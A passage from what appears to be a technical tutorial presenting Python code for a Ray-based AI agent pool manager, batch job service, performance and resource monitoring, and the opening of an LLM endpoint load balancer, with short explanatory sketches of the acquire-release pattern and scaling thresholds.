253 if idle_time > self.idle_timeout_seconds:
254 # Remove from pool
255 pool.remove(agent_ref)
256 del self.last_used[agent_ref]
257
258 # Kill the actor
259 ray.kill(agent_ref)
260
261 logger.info(f"Removed idle agent of type {agent_type} after {idle_time:.1f}s")
262
    async def get_agent(self, agent_type: str) -> ray.actor.ActorHandle:
        """
        Get an agent from the pool.

        Args:
            agent_type: Type of agent to get

        Returns:
            Ray actor handle for the agent
272
273 Raises:
274 ValueError: If agent type is not configured
275 """
276 if agent_type not in self.agent_configs:
277 raise ValueError(f"Agent type {agent_type} not configured")
278
279 # Check if agent available in pool
280 if not self.agent_pools[agent_type]:
281 # No agents available, create a new one if under limit
282 if len(self.busy_agents[agent_type]) < self.max_agents_per_type:
283 agent_ref = DistributedAgentActor.remote(self.agent_configs[agent_type])
284 self.busy_agents[agent_type][agent_ref] = time.time()
285 self.last_used[agent_ref] = time.time()
286 return agent_ref
            else:
                # Pool is at capacity: rather than blocking, share the busy
                # agent that was handed out longest ago. New requests queue
                # behind the work that agent is already doing.
                least_recent_agent, _ = min(
                    self.busy_agents[agent_type].items(),
                    key=lambda x: x[1]
                )
                return least_recent_agent
295
296 # Get agent from pool
297 agent_ref = self.agent_pools[agent_type].pop(0)
298 self.busy_agents[agent_type][agent_ref] = time.time()
299 self.last_used[agent_ref] = time.time()
300
301 return agent_ref
302
    def release_agent(self, agent_ref: ray.actor.ActorHandle, agent_type: str):
        """
        Release an agent back to the pool.

        Args:
            agent_ref: Ray actor handle for the agent
            agent_type: Type of agent
        """
        if agent_type not in self.agent_configs:
            logger.warning(f"Unknown agent type {agent_type} in release_agent")
            return

        # A shared agent can be released more than once; only the first release
        # moves it back to the pool, so it never appears there twice.
        if agent_ref not in self.busy_agents[agent_type]:
            return
        del self.busy_agents[agent_type][agent_ref]

        # Update last used time
        self.last_used[agent_ref] = time.time()

        # Add back to pool
        self.agent_pools[agent_type].append(agent_ref)
324
325 def get_pool_status(self) -> Dict[str, Any]:
326 """
327 Get the status of all agent pools.
328
329 Returns:
330 Dictionary with pool status
331 """
332 status = {}
333
334 for agent_type in self.agent_configs:
335 available = len(self.agent_pools.get(agent_type, []))
336 busy = len(self.busy_agents.get(agent_type, {}))
337
338 status[agent_type] = {
339 "available": available,
340 "busy": busy,
341 "total": available + busy,
342 "max": self.max_agents_per_type
343 }
344
345 return status
346
347class RayAgentManager:
348 """High-level manager for distributed AI agents using Ray."""
349
350 def __init__(self, agent_configs_path: str):
351 """
352 Initialize the Ray agent manager.
353
354 Args:
355 agent_configs_path: Path to agent configurations JSON file
356 """
357 # Load agent configurations
358 with open(agent_configs_path, 'r') as f:
359 self.agent_configs = json.load(f)
360
361 # Create agent pool manager
362 self.pool_manager = AgentPoolManager.remote(
363 agent_configs=self.agent_configs,
364 max_agents_per_type=10,
365 idle_timeout_seconds=300
366 )
367
368 async def process_request(self,
369 agent_type: str,
370 message: str,
371 context: Optional[str] = None) -> Dict[str, Any]:
372 """
373 Process a request using a distributed agent.
374
375 Args:
376 agent_type: Type of agent to use
377 message: User message
378 context: Optional context
379
380 Returns:
381 Response data
382 """
        agent_ref = None
        try:
            # Get an agent from the pool
            agent_ref = await self.pool_manager.get_agent.remote(agent_type)

            # Process the request
            return await agent_ref.generate_response.remote(message, context)

        except Exception as e:
            logger.error(f"Error processing request: {e}")
            return {"error": str(e)}

        finally:
            # Always release the agent, even if the request failed
            if agent_ref is not None:
                await self.pool_manager.release_agent.remote(agent_ref, agent_type)
398
399 async def get_pool_status(self) -> Dict[str, Any]:
400 """
401 Get the status of all agent pools.
402
403 Returns:
404 Dictionary with pool status
405 """
406 return await self.pool_manager.get_pool_status.remote()
407
408@ray.remote
409class BatchProcessingService:
410 """Service for batch processing with AI agents."""
411
    def __init__(self, agent_manager_ref: ray.actor.ActorHandle):
        """
        Initialize the batch processing service.

        Args:
            agent_manager_ref: Ray actor handle for the agent pool manager
        """
        self.agent_manager = agent_manager_ref
        self.running_jobs = {}
        # Strong references to background tasks so they are not garbage-collected
        self._background_tasks = set()

    async def submit_batch_job(self,
                               items: List[Dict[str, Any]],
                               agent_type: str,
                               max_concurrency: int = 5) -> str:
        """
        Submit a batch job for processing.

        Args:
            items: List of items to process
            agent_type: Type of agent to use
            max_concurrency: Maximum concurrent processing

        Returns:
            Job ID
        """
        # Generate a job ID
        job_id = f"job_{time.time()}_{len(self.running_jobs)}"

        # Register the job before processing starts
        self.running_jobs[job_id] = {
            "status": "running",
            "total_items": len(items),
            "completed_items": 0,
            "results": {},
            "errors": {},
            "start_time": time.time()
        }

        # Process items in the background. The event loop only keeps weak
        # references to tasks, so hold one here until the task finishes.
        import asyncio
        task = asyncio.create_task(
            self._process_batch(job_id, items, agent_type, max_concurrency)
        )
        self._background_tasks.add(task)
        task.add_done_callback(self._background_tasks.discard)

        return job_id
455
456 async def _process_batch(self,
457 job_id: str,
458 items: List[Dict[str, Any]],
459 agent_type: str,
460 max_concurrency: int):
461 """
462 Process a batch of items.
463
464 Args:
465 job_id: Job ID
466 items: List of items to process
467 agent_type: Type of agent to use
468 max_concurrency: Maximum concurrent processing
469 """
470 import asyncio
471
        # Process in batches to control concurrency
        for i in range(0, len(items), max_concurrency):
            batch = items[i:i + max_concurrency]

            # Process batch concurrently
            tasks = []
            item_ids = []
            for offset, item in enumerate(batch):
                # Default IDs use the item's global index so they stay unique
                item_id = item.get("id", f"item_{i + offset}")
                message = item.get("message", "")
                context = item.get("context")

                item_ids.append(item_id)
                tasks.append(self._process_item(item_id, message, context, agent_type))

            # Wait for all tasks in this batch to complete
            results = await asyncio.gather(*tasks, return_exceptions=True)

            # Update job status
            for item_id, outcome in zip(item_ids, results):
                # _process_item normally returns (item_id, result), but gather
                # can also hand back a bare exception
                result = outcome[1] if isinstance(outcome, tuple) else outcome
                if isinstance(result, BaseException):
                    self.running_jobs[job_id]["errors"][item_id] = str(result)
                else:
                    self.running_jobs[job_id]["results"][item_id] = result

                self.running_jobs[job_id]["completed_items"] += 1
497
498 # Mark job as completed
499 self.running_jobs[job_id]["status"] = "completed"
500 self.running_jobs[job_id]["end_time"] = time.time()
501 self.running_jobs[job_id]["duration"] = self.running_jobs[job_id]["end_time"] - self.running_jobs[job_id]["start_time"]
502
503 async def _process_item(self,
504 item_id: str,
505 message: str,
506 context: Optional[str],
507 agent_type: str) -> Tuple[str, Any]:
508 """
509 Process a single item.
510
511 Args:
512 item_id: Item ID
513 message: Message to process
514 context: Optional context
515 agent_type: Type of agent to use
516
517 Returns:
518 Tuple of (item_id, result)
519 """
        agent_ref = None
        try:
            # Get an agent from the pool
            agent_ref = await self.agent_manager.get_agent.remote(agent_type)

            # Process the request
            response = await agent_ref.generate_response.remote(message, context)
            return item_id, response

        except Exception as e:
            logger.error(f"Error processing item {item_id}: {e}")
            return item_id, e

        finally:
            # Always release the agent, even if processing failed
            if agent_ref is not None:
                await self.agent_manager.release_agent.remote(agent_ref, agent_type)
535
536 async def get_job_status(self, job_id: str) -> Dict[str, Any]:
537 """
538 Get the status of a batch job.
539
540 Args:
541 job_id: Job ID
542
543 Returns:
544 Job status
545 """
546 if job_id not in self.running_jobs:
547 return {"error": f"Job {job_id} not found"}
548
549 job_data = self.running_jobs[job_id].copy()
550
551 # Calculate progress
552 total_items = job_data["total_items"]
553 completed_items = job_data["completed_items"]
554 progress = (completed_items / total_items) * 100 if total_items > 0 else 0
555
556 job_data["progress"] = progress
557
558 # Limit the size of the response
559 if len(job_data["results"]) > 10:
560 result_sample = {k: job_data["results"][k] for k in list(job_data["results"])[:10]}
561 job_data["results"] = result_sample
562 job_data["results_truncated"] = True
563
564 if len(job_data["errors"]) > 10:
565 error_sample = {k: job_data["errors"][k] for k in list(job_data["errors"])[:10]}
566 job_data["errors"] = error_sample
567 job_data["errors_truncated"] = True
568
569 return job_data
570
571 async def list_jobs(self) -> List[Dict[str, Any]]:
572 """
573 List all batch jobs.
574
575 Returns:
576 List of job summaries
577 """
578 job_summaries = []
579
580 for job_id, job_data in self.running_jobs.items():
581 total_items = job_data["total_items"]
582 completed_items = job_data["completed_items"]
583 progress = (completed_items / total_items) * 100 if total_items > 0 else 0
584
585 summary = {
586 "job_id": job_id,
587 "status": job_data["status"],
588 "progress": progress,
589 "total_items": total_items,
590 "completed_items": completed_items,
591 "start_time": job_data.get("start_time"),
592 "end_time": job_data.get("end_time"),
593 "duration": job_data.get("duration"),
594 "error_count": len(job_data["errors"])
595 }
596
597 job_summaries.append(summary)
598
599 return job_summaries
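
The pool manager, request manager, and batch service above all follow the same acquire, use, release cycle. A minimal sketch of that cycle in plain `asyncio`, without Ray, may make the contract easier to see. `SimplePool` and `lease` are hypothetical names used only for illustration, and plain strings stand in for agent actors. Unlike `get_agent`, this sketch waits for an idle agent rather than sharing a busy one.

```python
import asyncio
from contextlib import asynccontextmanager
from typing import AsyncIterator, Dict, List


class SimplePool:
    """Hypothetical stand-in for AgentPoolManager: no Ray, strings as agents."""

    def __init__(self, agents: Dict[str, List[str]]):
        # One queue of idle agents per agent type
        self._idle: Dict[str, asyncio.Queue] = {}
        for agent_type, names in agents.items():
            queue: asyncio.Queue = asyncio.Queue()
            for name in names:
                queue.put_nowait(name)
            self._idle[agent_type] = queue

    @asynccontextmanager
    async def lease(self, agent_type: str) -> AsyncIterator[str]:
        if agent_type not in self._idle:
            raise ValueError(f"Agent type {agent_type} not configured")
        # Waits until an agent is idle instead of sharing a busy one
        agent = await self._idle[agent_type].get()
        try:
            yield agent
        finally:
            # Runs on success and on failure, so the agent is never leaked
            self._idle[agent_type].put_nowait(agent)

    def available(self, agent_type: str) -> int:
        return self._idle[agent_type].qsize()


async def demo() -> Dict[str, int]:
    pool = SimplePool({"research": ["agent-1", "agent-2"]})
    seen: Dict[str, int] = {}

    # While one agent is leased, one of the two remains idle
    async with pool.lease("research"):
        seen["during"] = pool.available("research")

    # A failure inside the lease still returns the agent to the pool
    try:
        async with pool.lease("research"):
            raise RuntimeError("simulated agent failure")
    except RuntimeError:
        pass

    seen["after_failure"] = pool.available("research")
    return seen


result = asyncio.run(demo())
print(result)
```

Wrapping the lease in a context manager puts the release in one place, which is the same guarantee a `try`/`finally` around `release_agent` gives in the Ray version.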

2. Performance Monitoring and Resource Management

python
1# monitoring/performance_tracker.py
2import os
3import time
4import json
5import threading
6import logging
7import psutil
8import numpy as np
9from typing import Dict, List, Any, Optional, Union, Tuple
10from dataclasses import dataclass, field
11
12logger = logging.getLogger(__name__)
13
14@dataclass
15class PerformanceMetrics:
16 """Performance metrics for AI agent operations."""
17 operation_id: str
18 operation_type: str
19 start_time: float
20 end_time: Optional[float] = None
21 duration: Optional[float] = None
22 success: bool = True
23 error: Optional[str] = None
24 token_count: Optional[int] = None
25 token_cost: Optional[float] = None
26 cpu_percent: Optional[float] = None
27 memory_mb: Optional[float] = None
28 metadata: Dict[str, Any] = field(default_factory=dict)
29
30class PerformanceTracker:
31 """
32 Tracks performance metrics for AI agent operations.
33 """
34
35 def __init__(self, metrics_path: Optional[str] = None):
36 """
37 Initialize the performance tracker.
38
39 Args:
40 metrics_path: Optional path for storing metrics
41 """
42 self.metrics_path = metrics_path
43 self.metrics = []
44 self.lock = threading.RLock()
45
46 # Initialize process monitoring
47 self.process = psutil.Process(os.getpid())
48
49 # Start metrics saving thread if path provided
50 if metrics_path:
51 self._start_metrics_saving()
52
53 def start_operation(self,
54 operation_type: str,
55 metadata: Optional[Dict[str, Any]] = None) -> str:
56 """
57 Start tracking an operation.
58
59 Args:
60 operation_type: Type of operation
61 metadata: Optional metadata
62
63 Returns:
64 Operation ID
65 """
66 operation_id = f"op_{time.time()}_{len(self.metrics)}"
67
68 # Create metrics object
69 metrics = PerformanceMetrics(
70 operation_id=operation_id,
71 operation_type=operation_type,
72 start_time=time.time(),
73 metadata=metadata or {}
74 )
75
        # Snapshot resource usage at start (best effort; the CPU sample blocks ~0.1 s)
        try:
            metrics.cpu_percent = self.process.cpu_percent(interval=0.1)
            metrics.memory_mb = self.process.memory_info().rss / (1024 * 1024)
        except psutil.Error as e:
            logger.debug(f"Could not sample resource usage: {e}")
82
83 # Store metrics
84 with self.lock:
85 self.metrics.append(metrics)
86
87 return operation_id
88
89 def end_operation(self,
90 operation_id: str,
91 success: bool = True,
92 error: Optional[str] = None,
93 token_count: Optional[int] = None,
94 token_cost: Optional[float] = None,
95 additional_metadata: Optional[Dict[str, Any]] = None) -> Optional[PerformanceMetrics]:
96 """
97 End tracking an operation.
98
99 Args:
100 operation_id: Operation ID
101 success: Whether the operation was successful
102 error: Optional error message
103 token_count: Optional token count
104 token_cost: Optional token cost
105 additional_metadata: Optional additional metadata
106
107 Returns:
108 Updated metrics or None if operation not found
109 """
110 with self.lock:
111 # Find the operation
112 for metrics in self.metrics:
113 if metrics.operation_id == operation_id:
114 # Update metrics
115 metrics.end_time = time.time()
116 metrics.duration = metrics.end_time - metrics.start_time
117 metrics.success = success
118 metrics.error = error
119 metrics.token_count = token_count
120 metrics.token_cost = token_cost
121
122 # Update metadata
123 if additional_metadata:
124 metrics.metadata.update(additional_metadata)
125
                    # Snapshot resource usage at end (overwrites the start snapshot)
                    try:
                        metrics.cpu_percent = self.process.cpu_percent(interval=0.1)
                        metrics.memory_mb = self.process.memory_info().rss / (1024 * 1024)
                    except psutil.Error as e:
                        logger.debug(f"Could not sample resource usage: {e}")
132
133 return metrics
134
135 logger.warning(f"Operation {operation_id} not found")
136 return None
137
138 def get_operation_metrics(self, operation_id: str) -> Optional[PerformanceMetrics]:
139 """
140 Get metrics for a specific operation.
141
142 Args:
143 operation_id: Operation ID
144
145 Returns:
146 Operation metrics or None if not found
147 """
148 with self.lock:
149 for metrics in self.metrics:
150 if metrics.operation_id == operation_id:
151 return metrics
152
153 return None
154
155 def get_metrics_summary(self) -> Dict[str, Any]:
156 """
157 Get a summary of all metrics.
158
159 Returns:
160 Dictionary with metrics summary
161 """
162 with self.lock:
163 # Count operations by type
164 operation_counts = {}
165 for metrics in self.metrics:
166 operation_type = metrics.operation_type
167 operation_counts[operation_type] = operation_counts.get(operation_type, 0) + 1
168
169 # Calculate success rates
170 success_rates = {}
171 for operation_type in operation_counts.keys():
172 type_metrics = [m for m in self.metrics if m.operation_type == operation_type]
173 success_count = sum(1 for m in type_metrics if m.success)
174 success_rates[operation_type] = success_count / len(type_metrics) if type_metrics else 0
175
176 # Calculate average durations
177 avg_durations = {}
178 for operation_type in operation_counts.keys():
179 type_metrics = [m for m in self.metrics if m.operation_type == operation_type and m.duration is not None]
180 if type_metrics:
181 avg_durations[operation_type] = sum(m.duration for m in type_metrics) / len(type_metrics)
182 else:
183 avg_durations[operation_type] = None
184
185 # Calculate token usage and costs
186 token_usage = {}
187 token_costs = {}
188 for operation_type in operation_counts.keys():
189 type_metrics = [m for m in self.metrics if m.operation_type == operation_type and m.token_count is not None]
190 if type_metrics:
191 token_usage[operation_type] = sum(m.token_count for m in type_metrics)
192 token_costs[operation_type] = sum(m.token_cost for m in type_metrics if m.token_cost is not None)
193 else:
194 token_usage[operation_type] = None
195 token_costs[operation_type] = None
196
197 # Create summary
198 return {
199 "total_operations": len(self.metrics),
200 "operation_counts": operation_counts,
201 "success_rates": success_rates,
202 "avg_durations": avg_durations,
203 "token_usage": token_usage,
204 "token_costs": token_costs
205 }
206
207 def get_performance_report(self) -> Dict[str, Any]:
208 """
209 Generate a detailed performance report.
210
211 Returns:
212 Dictionary with performance report
213 """
214 with self.lock:
215 # Copy metrics to avoid modification during analysis
216 metrics_copy = self.metrics.copy()
217
218 # Only analyze completed operations
219 completed = [m for m in metrics_copy if m.duration is not None]
220 if not completed:
221 return {"error": "No completed operations to analyze"}
222
223 # Group by operation type
224 by_type = {}
225 for metrics in completed:
226 operation_type = metrics.operation_type
227 if operation_type not in by_type:
228 by_type[operation_type] = []
229 by_type[operation_type].append(metrics)
230
231 # Analyze each operation type
232 type_reports = {}
233 for operation_type, type_metrics in by_type.items():
234 # Extract durations
235 durations = [m.duration for m in type_metrics]
236
237 # Calculate statistics
238 type_report = {
239 "count": len(type_metrics),
240 "success_count": sum(1 for m in type_metrics if m.success),
241 "error_count": sum(1 for m in type_metrics if not m.success),
242 "success_rate": sum(1 for m in type_metrics if m.success) / len(type_metrics),
243 "duration": {
244 "min": min(durations),
245 "max": max(durations),
246 "mean": np.mean(durations),
247 "median": np.median(durations),
248 "p95": np.percentile(durations, 95),
249 "p99": np.percentile(durations, 99)
250 }
251 }
252
253 # Calculate token usage if available
254 token_counts = [m.token_count for m in type_metrics if m.token_count is not None]
255 if token_counts:
256 type_report["token_usage"] = {
257 "min": min(token_counts),
258 "max": max(token_counts),
259 "mean": np.mean(token_counts),
260 "median": np.median(token_counts),
261 "total": sum(token_counts)
262 }
263
264 # Calculate costs if available
265 costs = [m.token_cost for m in type_metrics if m.token_cost is not None]
266 if costs:
267 type_report["cost"] = {
268 "min": min(costs),
269 "max": max(costs),
270 "mean": np.mean(costs),
271 "total": sum(costs)
272 }
273
274 # Add to type reports
275 type_reports[operation_type] = type_report
276
277 # Create overall report
278 all_durations = [m.duration for m in completed]
279 overall = {
280 "total_operations": len(completed),
281 "success_rate": sum(1 for m in completed if m.success) / len(completed),
282 "duration": {
283 "min": min(all_durations),
284 "max": max(all_durations),
285 "mean": np.mean(all_durations),
286 "median": np.median(all_durations),
287 "p95": np.percentile(all_durations, 95)
288 }
289 }
290
291 # Calculate overall token usage and cost
292 all_tokens = [m.token_count for m in completed if m.token_count is not None]
293 all_costs = [m.token_cost for m in completed if m.token_cost is not None]
294
295 if all_tokens:
296 overall["total_tokens"] = sum(all_tokens)
297 overall["avg_tokens_per_operation"] = sum(all_tokens) / len(all_tokens)
298
299 if all_costs:
300 overall["total_cost"] = sum(all_costs)
301 overall["avg_cost_per_operation"] = sum(all_costs) / len(all_costs)
302
303 # Return the complete report
304 return {
305 "overall": overall,
306 "by_operation_type": type_reports,
307 "generated_at": time.time()
308 }
309
310 def clear_metrics(self, older_than_seconds: Optional[float] = None):
311 """
312 Clear metrics from memory.
313
314 Args:
315 older_than_seconds: Optional time threshold to only clear older metrics
316 """
317 with self.lock:
318 if older_than_seconds is not None:
319 threshold = time.time() - older_than_seconds
320 self.metrics = [m for m in self.metrics if m.start_time >= threshold]
321 else:
322 self.metrics = []
323
324 def _start_metrics_saving(self):
325 """Start a background thread to periodically save metrics."""
326 def save_metrics_task():
327 while True:
328 try:
329 with self.lock:
330 # Only save completed operations
331 completed = [m for m in self.metrics if m.duration is not None]
332
333 # Convert to dictionary for serialization
334 metrics_dicts = []
335 for metrics in completed:
336 metrics_dict = {
337 "operation_id": metrics.operation_id,
338 "operation_type": metrics.operation_type,
339 "start_time": metrics.start_time,
340 "end_time": metrics.end_time,
341 "duration": metrics.duration,
342 "success": metrics.success,
343 "error": metrics.error,
344 "token_count": metrics.token_count,
345 "token_cost": metrics.token_cost,
346 "cpu_percent": metrics.cpu_percent,
347 "memory_mb": metrics.memory_mb,
348 "metadata": metrics.metadata
349 }
350 metrics_dicts.append(metrics_dict)
351
352 # Save to file
353 with open(self.metrics_path, 'w') as f:
354 json.dump(metrics_dicts, f, indent=2)
355
356 logger.debug(f"Saved {len(metrics_dicts)} metrics to {self.metrics_path}")
357
358 except Exception as e:
359 logger.error(f"Error saving metrics: {e}")
360
361 # Sleep for 5 minutes
362 time.sleep(300)
363
364 # Start thread
365 save_thread = threading.Thread(target=save_metrics_task, daemon=True)
366 save_thread.start()
367
368class ResourceMonitor:
369 """
370 Monitors system resources and provides recommendations for scaling.
371 """
372
373 def __init__(self,
374 high_cpu_threshold: float = 80.0,
375 high_memory_threshold: float = 80.0,
376 sampling_interval: float = 5.0):
377 """
378 Initialize the resource monitor.
379
380 Args:
381 high_cpu_threshold: CPU usage percentage threshold for scaling recommendations
382 high_memory_threshold: Memory usage percentage threshold for scaling recommendations
383 sampling_interval: Sampling interval in seconds
384 """
385 self.high_cpu_threshold = high_cpu_threshold
386 self.high_memory_threshold = high_memory_threshold
387 self.sampling_interval = sampling_interval
388
389 self.is_monitoring = False
390 self.monitor_thread = None
391 self.samples = []
392 self.lock = threading.RLock()
393
394 def start_monitoring(self):
395 """Start resource monitoring."""
396 if self.is_monitoring:
397 return
398
399 self.is_monitoring = True
400 self.monitor_thread = threading.Thread(target=self._monitoring_task, daemon=True)
401 self.monitor_thread.start()
402
403 logger.info("Resource monitoring started")
404
405 def stop_monitoring(self):
406 """Stop resource monitoring."""
407 self.is_monitoring = False
408 if self.monitor_thread:
409 self.monitor_thread.join(timeout=1.0)
410 self.monitor_thread = None
411
412 logger.info("Resource monitoring stopped")
413
414 def _monitoring_task(self):
415 """Background task for monitoring resources."""
416 while self.is_monitoring:
417 try:
418 # Get CPU and memory usage
419 cpu_percent = psutil.cpu_percent(interval=1.0)
420 memory = psutil.virtual_memory()
421 memory_percent = memory.percent
422
423 # Get disk usage
424 disk = psutil.disk_usage('/')
425 disk_percent = disk.percent
426
427 # Get network IO
428 network = psutil.net_io_counters()
429
430 # Store sample
431 sample = {
432 "timestamp": time.time(),
433 "cpu_percent": cpu_percent,
434 "memory_percent": memory_percent,
435 "memory_used_gb": memory.used / (1024 * 1024 * 1024),
436 "memory_total_gb": memory.total / (1024 * 1024 * 1024),
437 "disk_percent": disk_percent,
438 "disk_used_gb": disk.used / (1024 * 1024 * 1024),
439 "disk_total_gb": disk.total / (1024 * 1024 * 1024),
440 "network_bytes_sent": network.bytes_sent,
441 "network_bytes_recv": network.bytes_recv
442 }
443
444 with self.lock:
445 self.samples.append(sample)
446
447 # Keep only the last 1000 samples
448 if len(self.samples) > 1000:
449 self.samples = self.samples[-1000:]
450
451 # Sleep until next sample
452 time.sleep(self.sampling_interval)
453
454 except Exception as e:
455 logger.error(f"Error in resource monitoring: {e}")
456 time.sleep(self.sampling_interval)
457
458 def get_current_usage(self) -> Dict[str, Any]:
459 """
460 Get current resource usage.
461
462 Returns:
463 Dictionary with current resource usage
464 """
465 try:
466 # Get CPU and memory usage
467 cpu_percent = psutil.cpu_percent(interval=0.5)
468 memory = psutil.virtual_memory()
469 memory_percent = memory.percent
470
471 # Get disk usage
472 disk = psutil.disk_usage('/')
473 disk_percent = disk.percent
474
475 # Get network IO
476 network = psutil.net_io_counters()
477
478 return {
479 "timestamp": time.time(),
480 "cpu_percent": cpu_percent,
481 "memory_percent": memory_percent,
482 "memory_used_gb": memory.used / (1024 * 1024 * 1024),
483 "memory_total_gb": memory.total / (1024 * 1024 * 1024),
484 "disk_percent": disk_percent,
485 "disk_used_gb": disk.used / (1024 * 1024 * 1024),
486 "disk_total_gb": disk.total / (1024 * 1024 * 1024),
487 "network_bytes_sent": network.bytes_sent,
488 "network_bytes_recv": network.bytes_recv
489 }
490
491 except Exception as e:
492 logger.error(f"Error getting current usage: {e}")
493 return {"error": str(e)}
494
495 def get_usage_history(self,
496 metric: str = "cpu_percent",
497 limit: int = 60) -> List[Tuple[float, float]]:
498 """
499 Get historical usage data for a specific metric.
500
501 Args:
502 metric: Metric to retrieve (e.g., cpu_percent, memory_percent)
503 limit: Maximum number of samples to return
504
505 Returns:
506 List of (timestamp, value) tuples
507 """
508 with self.lock:
509 # Copy samples to avoid modification during processing
510 samples = self.samples[-limit:] if limit > 0 else self.samples
511
512 # Extract specified metric
513 history = [(s["timestamp"], s.get(metric, 0)) for s in samples if metric in s]
514
515 return history
516
517 def get_scaling_recommendation(self) -> Dict[str, Any]:
518 """
519 Get scaling recommendations based on resource usage.
520
521 Returns:
522 Dictionary with scaling recommendations
523 """
524 with self.lock:
525 # Get recent samples
526 recent_samples = self.samples[-30:] if len(self.samples) >= 30 else self.samples
527
528 if not recent_samples:
529 return {"recommendation": "insufficient_data", "reason": "Not enough monitoring data"}
530
531 # Calculate average resource usage
532 avg_cpu = sum(s["cpu_percent"] for s in recent_samples) / len(recent_samples)
533 avg_memory = sum(s["memory_percent"] for s in recent_samples) / len(recent_samples)
534
535 # Check for high CPU usage
536 if avg_cpu > self.high_cpu_threshold:
537 return {
538 "recommendation": "scale_up",
539 "reason": "high_cpu_usage",
540 "details": {
541 "avg_cpu_percent": avg_cpu,
542 "threshold": self.high_cpu_threshold,
543 "suggested_action": "Increase number of worker nodes or CPU allocation"
544 }
545 }
546
547 # Check for high memory usage
548 if avg_memory > self.high_memory_threshold:
549 return {
550 "recommendation": "scale_up",
551 "reason": "high_memory_usage",
552 "details": {
553 "avg_memory_percent": avg_memory,
554 "threshold": self.high_memory_threshold,
555 "suggested_action": "Increase memory allocation or add more nodes"
556 }
557 }
558
559 # Check for potential downscaling
560 if avg_cpu < self.high_cpu_threshold / 2 and avg_memory < self.high_memory_threshold / 2:
561 return {
562 "recommendation": "scale_down",
563 "reason": "low_resource_usage",
564 "details": {
565 "avg_cpu_percent": avg_cpu,
566 "avg_memory_percent": avg_memory,
567 "suggested_action": "Consider reducing resource allocation if this pattern persists"
568 }
569 }
570
571 # Default recommendation
572 return {
573 "recommendation": "maintain",
574 "reason": "resource_usage_within_limits",
575 "details": {
576 "avg_cpu_percent": avg_cpu,
577 "avg_memory_percent": avg_memory
578 }
579 }
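
The threshold rules in `get_scaling_recommendation` are easier to unit-test once they are separated from the sampling thread. The sketch below restates them as a pure function over a list of samples. `recommend_scaling` is a hypothetical helper, not part of the module above, and it returns only the recommendation label rather than the full details dictionary.

```python
from typing import Dict, List


def recommend_scaling(samples: List[Dict[str, float]],
                      high_cpu: float = 80.0,
                      high_memory: float = 80.0,
                      window: int = 30) -> str:
    """Hypothetical pure-function version of the scaling threshold rules."""
    # Only the most recent `window` samples are considered
    recent = samples[-window:]
    if not recent:
        return "insufficient_data"

    avg_cpu = sum(s["cpu_percent"] for s in recent) / len(recent)
    avg_memory = sum(s["memory_percent"] for s in recent) / len(recent)

    # Either resource above its threshold triggers a scale-up
    if avg_cpu > high_cpu or avg_memory > high_memory:
        return "scale_up"
    # Both resources below half their thresholds suggests a scale-down
    if avg_cpu < high_cpu / 2 and avg_memory < high_memory / 2:
        return "scale_down"
    return "maintain"


busy = [{"cpu_percent": 92.0, "memory_percent": 60.0}] * 5
idle = [{"cpu_percent": 10.0, "memory_percent": 20.0}] * 5
steady = [{"cpu_percent": 55.0, "memory_percent": 50.0}] * 5

for name, data in [("empty", []), ("busy", busy), ("idle", idle), ("steady", steady)]:
    print(name, recommend_scaling(data))
```

Because the function takes its samples as an argument, the same rules can be exercised with synthetic data in tests and with `ResourceMonitor.samples` in production.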

3. Dynamic Load Balancing for LLM-Powered Systems

python
1# load_balancing/llm_load_balancer.py
2import os
3import time
4import json
5import random
6import logging
7import threading
8import datetime
9from typing import Dict, List, Any, Optional, Callable, TypeVar, Generic, Tuple
10
11T = TypeVar('T') # Input type
12R = TypeVar('R') # Result type
13
14logger = logging.getLogger(__name__)
15
16class ModelEndpoint:
17 """
18 Represents an LLM API endpoint with performance characteristics.
19 """
20
21 def __init__(self,
22 endpoint_id: str,
23 model_name: str,
24 api_key: str,
25 max_requests_per_minute: int,
26 max_tokens_per_minute: int,
27 latency_ms: float = 1000.0,
28 cost_per_1k_tokens: float = 0.0,
29 context_window: int = 4096,
30 endpoint_url: Optional[str] = None,
31 supports_functions: bool = False,
                 capabilities: Optional[List[str]] = None):
33 """
34 Initialize a model endpoint.
35
36 Args:
37 endpoint_id: Unique identifier for this endpoint
38 model_name: Name of the model (e.g., gpt-4-turbo)
39 api_key: API key for this endpoint
40 max_requests_per_minute: Maximum requests per minute
41 max_tokens_per_minute: Maximum tokens per minute
42 latency_ms: Average latency in milliseconds
43 cost_per_1k_tokens: Cost per 1000 tokens
44 context_window: Maximum context window size in tokens
45 endpoint_url: Optional custom endpoint URL
46 supports_functions: Whether this endpoint supports function calling
47 capabilities: List of special capabilities this endpoint supports
48 """
49 self.endpoint_id = endpoint_id
50 self.model_name = model_name
51 self.api_key = api_key
52 self.max_requests_per_minute = max_requests_per_minute
53 self.max_tokens_per_minute = max_tokens_per_minute
54 self.latency_ms = latency_ms
55 self.cost_per_1k_tokens = cost_per_1k_tokens
56 self.context_window = context_window
57 self.endpoint_url = endpoint_url
58 self.supports_functions = supports_functions
59 self.capabilities = capabilities or []
60
61 # Metrics tracking
62 self.requests_last_minute = 0
63 self.tokens_last_minute = 0
64 self.last_request_time = 0
65 self.success_count = 0
66 self.error_count = 0
67 self.total_latency_ms = 0
68 self.total_tokens = 0
69 self.total_cost = 0.0
70
71 # Last minute tracking
72 self.request_timestamps = []
73 self.token_usage_events = []
74
75 # Health status
76 self.is_healthy = True
77 self.last_error = None
78 self.consecutive_errors = 0
79
80 # Lock for thread safety
81 self.lock = threading.RLock()
82
    def update_metrics(self,
                       success: bool,
                       latency_ms: float,
                       tokens_used: int,
                       error: Optional[str] = None):
        """
        Update endpoint metrics after a request.

        Args:
            success: Whether the request was successful
            latency_ms: Request latency in milliseconds
            tokens_used: Number of tokens used
            error: Optional error message
        """
        current_time = time.time()

        with self.lock:
            # Update overall metrics
            if success:
                self.success_count += 1
                self.total_latency_ms += latency_ms
                self.total_tokens += tokens_used
                self.total_cost += (tokens_used / 1000) * self.cost_per_1k_tokens
                self.last_error = None
                self.consecutive_errors = 0
            else:
                self.error_count += 1
                self.last_error = error
                self.consecutive_errors += 1

                # Mark as unhealthy after 3 consecutive errors
                if self.consecutive_errors >= 3:
                    self.is_healthy = False

            # Update last minute tracking
            self.last_request_time = current_time
            self.request_timestamps.append(current_time)

            if tokens_used > 0:
                self.token_usage_events.append((current_time, tokens_used))

            # Remove old timestamps (older than 1 minute)
            one_minute_ago = current_time - 60
            self.request_timestamps = [
                ts for ts in self.request_timestamps if ts > one_minute_ago
            ]
            self.token_usage_events = [
                event for event in self.token_usage_events if event[0] > one_minute_ago
            ]

            # Update current rates
